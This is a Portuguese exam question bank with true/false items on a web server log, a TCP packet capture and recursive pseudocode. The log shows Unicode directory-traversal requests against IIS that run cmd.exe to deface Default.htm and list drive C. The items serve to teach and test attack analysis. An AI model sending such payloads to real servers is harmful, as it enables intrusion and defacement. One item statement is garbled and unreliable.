Foram encontradas 1.731 questões.
I host.somewhere.org - - [DD/MMM/YYYY:00:24:11 -0200] "GET/IISADMPWD/ ..%c0%af..%c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+0wnd+by+m3+>c:\inetpub
\wwwroot\Default.htm HTTP/1.0" 500 87
II host.somewhere.org - - [DD/MMM/YYYY:00:24:28 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+0wnd+by+m3+>c:\inetpub
\wwwroot\Default.htm HTTP/1.0" 500 87
III host.somewhere.org - - [DD/MMM/YYYY:00:25:55 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\
wwwroot\Default.htm HTTP/1.0" 404 461
IV host.somewhere.org - - [DD/MMM/YYYY:00:27:34 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\Default.htm HTTP/1.0" 502 215
V host.somewhere.org - - [DD/MMM/YYYY:00:30:09 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\Default.htm HTTP/1.0" 502 215
VI host.somewhere.org - - [DD/MMM/YYYY:00:30:30 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\myweb.dll HTTP/1.0" 502 215
VII host.somewhere.org - - [DD/MMM/YYYY:00:30:51 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880
VIII host.somewhere.org - - [DD/MMM/YYYY:00:34:38 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\myweb.dll HTTP/1.0" 200 215
Com relação ao log apresentado acima, na forma dos eventos de I a VIII, julgue o item que se segue.
A evolução temporal é consistente com um ataque realizado por ferramenta automática, sem intervenção humana.
Provas
I host.somewhere.org - - [DD/MMM/YYYY:00:24:11 -0200] "GET/IISADMPWD/ ..%c0%af..%c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+0wnd+by+m3+>c:\inetpub
\wwwroot\Default.htm HTTP/1.0" 500 87
II host.somewhere.org - - [DD/MMM/YYYY:00:24:28 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+0wnd+by+m3+>c:\inetpub
\wwwroot\Default.htm HTTP/1.0" 500 87
III host.somewhere.org - - [DD/MMM/YYYY:00:25:55 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\
wwwroot\Default.htm HTTP/1.0" 404 461
IV host.somewhere.org - - [DD/MMM/YYYY:00:27:34 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\Default.htm HTTP/1.0" 502 215
V host.somewhere.org - - [DD/MMM/YYYY:00:30:09 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\Default.htm HTTP/1.0" 502 215
VI host.somewhere.org - - [DD/MMM/YYYY:00:30:30 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\myweb.dll HTTP/1.0" 502 215
VII host.somewhere.org - - [DD/MMM/YYYY:00:30:51 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880
VIII host.somewhere.org - - [DD/MMM/YYYY:00:34:38 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\myweb.dll HTTP/1.0" 200 215
Com relação ao log apresentado acima, na forma dos eventos de I a VIII, julgue o item que se segue.
Existe em IPs no servidor em questão, conforme demonstrado pelos eventos VII e VIII.
Provas
I host.somewhere.org - - [DD/MMM/YYYY:00:24:11 -0200] "GET/IISADMPWD/ ..%c0%af..%c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+0wnd+by+m3+>c:\inetpub
\wwwroot\Default.htm HTTP/1.0" 500 87
II host.somewhere.org - - [DD/MMM/YYYY:00:24:28 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+0wnd+by+m3+>c:\inetpub
\wwwroot\Default.htm HTTP/1.0" 500 87
III host.somewhere.org - - [DD/MMM/YYYY:00:25:55 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\
wwwroot\Default.htm HTTP/1.0" 404 461
IV host.somewhere.org - - [DD/MMM/YYYY:00:27:34 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\Default.htm HTTP/1.0" 502 215
V host.somewhere.org - - [DD/MMM/YYYY:00:30:09 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\Default.htm HTTP/1.0" 502 215
VI host.somewhere.org - - [DD/MMM/YYYY:00:30:30 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\myweb.dll HTTP/1.0" 502 215
VII host.somewhere.org - - [DD/MMM/YYYY:00:30:51 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af.. %c0%af..
%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880
VIII host.somewhere.org - - [DD/MMM/YYYY:00:34:38 -0200] "GET/IISADMPWD/.. %c0%af.. %c0%af..
%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+0wnd+by+m3+>c:\inetpub\w
wwroot\myweb.dll HTTP/1.0" 200 215
Com relação ao log apresentado acima, na forma dos eventos de I a VIII, julgue o item que se segue.
Trata-se de uma tentativa de desfiguração (defacement) de uma página web.
Provas
- Segurança de RedesAnálise de Tráfego
- Segurança de RedesCaptura de Tráfego
- TCP/IPTCP: Transmission Control Protocol
I 0.771929 IP (tos 0x10, ttl 64, id 46018, offset 0, flags [DF], proto: TCP (6), length: 60)
1.1.1.1.1111 > 2.2.2.2.2222: S, cksum 0x1db2 (correct), 0:0(0) win 5840 <mss
1460,sackOK,timestamp 2538826 0,nop,wscale 6>
II 0.994556 IP (tos 0x0, ttl 50, id 20037, offset 0, flags [DF], proto: TCP (6), length: 44)
2.2.2.2.2222 > 1.1.1.1.1111: S, cksum 0x9e62 (correct), 0:0(0) ack 1 win 5840 <mss 1460>
III 0.994605 IP (tos 0x10, ttl 64, id 46019, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb61f (correct), 1:1(0) ack 1 win 5840
IV 3.909380 IP (tos 0x10, ttl 64, id 46020, offset 0, flags [DF], proto: TCP (6), length: 47)
1.1.1.1.1111 > 2.2.2.2.2222: P, cksum 0xa89d (correct), 1:8(7) ack 1 win 5840
V 4.220509 IP (tos 0x0, ttl 50, id 20038, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xb618 (correct), 1:1(0) ack 8 win 5840
VI 4.220591 IP (tos 0x0, ttl 50, id 20041, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: F, cksum 0xae04 (correct), 2068:2068(0) ack 8 win 5840
VII 4.220607 IP (tos 0x10, ttl 64, id 46021, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
VIII 4.223374 IP (tos 0x0, ttl 50, id 20040, offset 0, flags [DF], proto: TCP (6), length: 647)
2.2.2.2.2222 > 1.1.1.1.1111: P, cksum 0xe4c5 (correct), 1461:2068(607) ack 8 win 5840
IX 4.223381 IP (tos 0x10, ttl 64, id 46022, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
X 4.229617 IP (tos 0x0, ttl 50, id 20039, offset 0, flags [DF], proto: TCP (6), length: 1500)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xbf1b (correct), 1:1461(1460) ack 8 win 5840
XI 4.229632 IP (tos 0x10, ttl 64, id 46023, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xa29c (correct), 8:8(0) ack 2069 win 8760
XII 4.231280 IP (tos 0x10, ttl 64, id 46024, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: F, cksum 0xa29b (correct), 8:8(0) ack 2069 win 8760
XIII 4.452312 IP (tos 0x0, ttl 50, id 20042, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xae03 (correct), 2069:2069(0) ack 9 win 5840
Considerando a captura de tráfego apresentada acima, na forma de segmentos numerados de I a XIII, julgue o item que se segue.
É consistente a afirmativa de que houve perda de segmentos na captura.
Provas
- Protocolos e Serviços
- TCP/IPSub-redes, Máscara e Endereçamento IP
- TCP/IPTCP: Transmission Control Protocol
I 0.771929 IP (tos 0x10, ttl 64, id 46018, offset 0, flags [DF], proto: TCP (6), length: 60)
1.1.1.1.1111 > 2.2.2.2.2222: S, cksum 0x1db2 (correct), 0:0(0) win 5840 <mss
1460,sackOK,timestamp 2538826 0,nop,wscale 6>
II 0.994556 IP (tos 0x0, ttl 50, id 20037, offset 0, flags [DF], proto: TCP (6), length: 44)
2.2.2.2.2222 > 1.1.1.1.1111: S, cksum 0x9e62 (correct), 0:0(0) ack 1 win 5840 <mss 1460>
III 0.994605 IP (tos 0x10, ttl 64, id 46019, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb61f (correct), 1:1(0) ack 1 win 5840
IV 3.909380 IP (tos 0x10, ttl 64, id 46020, offset 0, flags [DF], proto: TCP (6), length: 47)
1.1.1.1.1111 > 2.2.2.2.2222: P, cksum 0xa89d (correct), 1:8(7) ack 1 win 5840
V 4.220509 IP (tos 0x0, ttl 50, id 20038, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xb618 (correct), 1:1(0) ack 8 win 5840
VI 4.220591 IP (tos 0x0, ttl 50, id 20041, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: F, cksum 0xae04 (correct), 2068:2068(0) ack 8 win 5840
VII 4.220607 IP (tos 0x10, ttl 64, id 46021, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
VIII 4.223374 IP (tos 0x0, ttl 50, id 20040, offset 0, flags [DF], proto: TCP (6), length: 647)
2.2.2.2.2222 > 1.1.1.1.1111: P, cksum 0xe4c5 (correct), 1461:2068(607) ack 8 win 5840
IX 4.223381 IP (tos 0x10, ttl 64, id 46022, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
X 4.229617 IP (tos 0x0, ttl 50, id 20039, offset 0, flags [DF], proto: TCP (6), length: 1500)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xbf1b (correct), 1:1461(1460) ack 8 win 5840
XI 4.229632 IP (tos 0x10, ttl 64, id 46023, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xa29c (correct), 8:8(0) ack 2069 win 8760
XII 4.231280 IP (tos 0x10, ttl 64, id 46024, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: F, cksum 0xa29b (correct), 8:8(0) ack 2069 win 8760
XIII 4.452312 IP (tos 0x0, ttl 50, id 20042, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xae03 (correct), 2069:2069(0) ack 9 win 5840
Considerando a captura de tráfego apresentada acima, na forma de segmentos numerados de I a XIII, julgue o item que se segue.
Houve entrega fora de ordem nos segmentos de IV a X.
Provas
- Segurança de RedesAnálise de Tráfego
- Segurança de RedesCaptura de Tráfego
- TCP/IPConceitos e Especificações do IP
- TCP/IPTCP: Transmission Control Protocol
I 0.771929 IP (tos 0x10, ttl 64, id 46018, offset 0, flags [DF], proto: TCP (6), length: 60)
1.1.1.1.1111 > 2.2.2.2.2222: S, cksum 0x1db2 (correct), 0:0(0) win 5840 <mss
1460,sackOK,timestamp 2538826 0,nop,wscale 6>
II 0.994556 IP (tos 0x0, ttl 50, id 20037, offset 0, flags [DF], proto: TCP (6), length: 44)
2.2.2.2.2222 > 1.1.1.1.1111: S, cksum 0x9e62 (correct), 0:0(0) ack 1 win 5840 <mss 1460>
III 0.994605 IP (tos 0x10, ttl 64, id 46019, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb61f (correct), 1:1(0) ack 1 win 5840
IV 3.909380 IP (tos 0x10, ttl 64, id 46020, offset 0, flags [DF], proto: TCP (6), length: 47)
1.1.1.1.1111 > 2.2.2.2.2222: P, cksum 0xa89d (correct), 1:8(7) ack 1 win 5840
V 4.220509 IP (tos 0x0, ttl 50, id 20038, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xb618 (correct), 1:1(0) ack 8 win 5840
VI 4.220591 IP (tos 0x0, ttl 50, id 20041, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: F, cksum 0xae04 (correct), 2068:2068(0) ack 8 win 5840
VII 4.220607 IP (tos 0x10, ttl 64, id 46021, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
VIII 4.223374 IP (tos 0x0, ttl 50, id 20040, offset 0, flags [DF], proto: TCP (6), length: 647)
2.2.2.2.2222 > 1.1.1.1.1111: P, cksum 0xe4c5 (correct), 1461:2068(607) ack 8 win 5840
IX 4.223381 IP (tos 0x10, ttl 64, id 46022, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
X 4.229617 IP (tos 0x0, ttl 50, id 20039, offset 0, flags [DF], proto: TCP (6), length: 1500)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xbf1b (correct), 1:1461(1460) ack 8 win 5840
XI 4.229632 IP (tos 0x10, ttl 64, id 46023, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xa29c (correct), 8:8(0) ack 2069 win 8760
XII 4.231280 IP (tos 0x10, ttl 64, id 46024, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: F, cksum 0xa29b (correct), 8:8(0) ack 2069 win 8760
XIII 4.452312 IP (tos 0x0, ttl 50, id 20042, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xae03 (correct), 2069:2069(0) ack 9 win 5840
Considerando a captura de tráfego apresentada acima, na forma de segmentos numerados de I a XIII, julgue o item que se segue.
Não é consistente a afirmativa de que a captura foi realizada no host 1.1.1.1.
Provas
I 0.771929 IP (tos 0x10, ttl 64, id 46018, offset 0, flags [DF], proto: TCP (6), length: 60)
1.1.1.1.1111 > 2.2.2.2.2222: S, cksum 0x1db2 (correct), 0:0(0) win 5840 <mss
1460,sackOK,timestamp 2538826 0,nop,wscale 6>
II 0.994556 IP (tos 0x0, ttl 50, id 20037, offset 0, flags [DF], proto: TCP (6), length: 44)
2.2.2.2.2222 > 1.1.1.1.1111: S, cksum 0x9e62 (correct), 0:0(0) ack 1 win 5840 <mss 1460>
III 0.994605 IP (tos 0x10, ttl 64, id 46019, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb61f (correct), 1:1(0) ack 1 win 5840
IV 3.909380 IP (tos 0x10, ttl 64, id 46020, offset 0, flags [DF], proto: TCP (6), length: 47)
1.1.1.1.1111 > 2.2.2.2.2222: P, cksum 0xa89d (correct), 1:8(7) ack 1 win 5840
V 4.220509 IP (tos 0x0, ttl 50, id 20038, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xb618 (correct), 1:1(0) ack 8 win 5840
VI 4.220591 IP (tos 0x0, ttl 50, id 20041, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: F, cksum 0xae04 (correct), 2068:2068(0) ack 8 win 5840
VII 4.220607 IP (tos 0x10, ttl 64, id 46021, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
VIII 4.223374 IP (tos 0x0, ttl 50, id 20040, offset 0, flags [DF], proto: TCP (6), length: 647)
2.2.2.2.2222 > 1.1.1.1.1111: P, cksum 0xe4c5 (correct), 1461:2068(607) ack 8 win 5840
IX 4.223381 IP (tos 0x10, ttl 64, id 46022, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
X 4.229617 IP (tos 0x0, ttl 50, id 20039, offset 0, flags [DF], proto: TCP (6), length: 1500)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xbf1b (correct), 1:1461(1460) ack 8 win 5840
XI 4.229632 IP (tos 0x10, ttl 64, id 46023, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xa29c (correct), 8:8(0) ack 2069 win 8760
XII 4.231280 IP (tos 0x10, ttl 64, id 46024, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: F, cksum 0xa29b (correct), 8:8(0) ack 2069 win 8760
XIII 4.452312 IP (tos 0x0, ttl 50, id 20042, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xae03 (correct), 2069:2069(0) ack 9 win 5840
Considerando a captura de tráfego apresentada acima, na forma de segmentos numerados de I a XIII, julgue o item que se segue.
O segmento XII consiste em uma retransmissão do segmento XI.
Provas
- Gerenciamento de Redes
- Modelo TCP/IPModelo TCP/IP: Camada de Transporte
- Segurança de RedesAnálise de Tráfego
- TCP/IPTCP: Transmission Control Protocol
I 0.771929 IP (tos 0x10, ttl 64, id 46018, offset 0, flags [DF], proto: TCP (6), length: 60)
1.1.1.1.1111 > 2.2.2.2.2222: S, cksum 0x1db2 (correct), 0:0(0) win 5840 <mss
1460,sackOK,timestamp 2538826 0,nop,wscale 6>
II 0.994556 IP (tos 0x0, ttl 50, id 20037, offset 0, flags [DF], proto: TCP (6), length: 44)
2.2.2.2.2222 > 1.1.1.1.1111: S, cksum 0x9e62 (correct), 0:0(0) ack 1 win 5840 <mss 1460>
III 0.994605 IP (tos 0x10, ttl 64, id 46019, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb61f (correct), 1:1(0) ack 1 win 5840
IV 3.909380 IP (tos 0x10, ttl 64, id 46020, offset 0, flags [DF], proto: TCP (6), length: 47)
1.1.1.1.1111 > 2.2.2.2.2222: P, cksum 0xa89d (correct), 1:8(7) ack 1 win 5840
V 4.220509 IP (tos 0x0, ttl 50, id 20038, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xb618 (correct), 1:1(0) ack 8 win 5840
VI 4.220591 IP (tos 0x0, ttl 50, id 20041, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: F, cksum 0xae04 (correct), 2068:2068(0) ack 8 win 5840
VII 4.220607 IP (tos 0x10, ttl 64, id 46021, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
VIII 4.223374 IP (tos 0x0, ttl 50, id 20040, offset 0, flags [DF], proto: TCP (6), length: 647)
2.2.2.2.2222 > 1.1.1.1.1111: P, cksum 0xe4c5 (correct), 1461:2068(607) ack 8 win 5840
IX 4.223381 IP (tos 0x10, ttl 64, id 46022, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xb618 (correct), 8:8(0) ack 1 win 5840
X 4.229617 IP (tos 0x0, ttl 50, id 20039, offset 0, flags [DF], proto: TCP (6), length: 1500)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xbf1b (correct), 1:1461(1460) ack 8 win 5840
XI 4.229632 IP (tos 0x10, ttl 64, id 46023, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: ., cksum 0xa29c (correct), 8:8(0) ack 2069 win 8760
XII 4.231280 IP (tos 0x10, ttl 64, id 46024, offset 0, flags [DF], proto: TCP (6), length: 40)
1.1.1.1.1111 > 2.2.2.2.2222: F, cksum 0xa29b (correct), 8:8(0) ack 2069 win 8760
XIII 4.452312 IP (tos 0x0, ttl 50, id 20042, offset 0, flags [DF], proto: TCP (6), length: 40)
2.2.2.2.2222 > 1.1.1.1.1111: ., cksum 0xae03 (correct), 2069:2069(0) ack 9 win 5840
Considerando a captura de tráfego apresentada acima, na forma de segmentos numerados de I a XIII, julgue o item que se segue.
A captura apresenta apenas uma conexão TCP, estabelecida nos segmentos de I a III e encerrada nos segmentos VI e de XI a XIII.
Provas
- Fundamentos de ProgramaçãoAlgoritmosConstrução de Algoritmos
- Fundamentos de ProgramaçãoEstruturas de Seleção
- Fundamentos de ProgramaçãoLógica de Programação
- Fundamentos de ProgramaçãoRecursividade
1 função func(var M[ ], A, B: inteiro): inteiro
2 inicio
3 se (A = B) então
4 se (M[A] % 2 = 0) então
5 retorne 1
6 senão
7 retorne 0
8 fimse
9 senão
10 se (M[A] % 2 = 0) então
11 retorne 1 + func(M, A + 1, B)
12 senão
13 retorne func(M, A + 1, B)
14 fimse
15 fimse
16 fim
Considerando o algoritmo acima, no qual A e B são valores inteiros e M[ ] é um vetor de valores inteiros cujo primeiro elemento está localizado na posição 1 e os argumentos são passados por referência, julgue o item a seguir.
Se as linhas 6 e 7 forem retiradas, o algoritmo passa a ter um erro de lógica, o que leva à execução infinita, independentemente dos valores dos argumentos passados.
Provas
- Fundamentos de ProgramaçãoEstruturas de Repetição
- Fundamentos de ProgramaçãoLógica de Programação
- Fundamentos de ProgramaçãoRecursividade vs Iteratividade
- Fundamentos de ProgramaçãoRecursividade
1 função func(var M[ ], A, B: inteiro): inteiro
2 inicio
3 se (A = B) então
4 se (M[A] % 2 = 0) então
5 retorne 1
6 senão
7 retorne 0
8 fimse
9 senão
10 se (M[A] % 2 = 0) então
11 retorne 1 + func(M, A + 1, B)
12 senão
13 retorne func(M, A + 1, B)
14 fimse
15 fimse
16 fim
Considerando o algoritmo acima, no qual A e B são valores inteiros e M[ ] é um vetor de valores inteiros cujo primeiro elemento está localizado na posição 1 e os argumentos são passados por referência, julgue o item a seguir.
Por meio de um algoritmo que utilize estruturas de repetição, mas não use recursividade, é impossível obter o mesmo resultado do algoritmo apresentado.
Provas
Caderno Container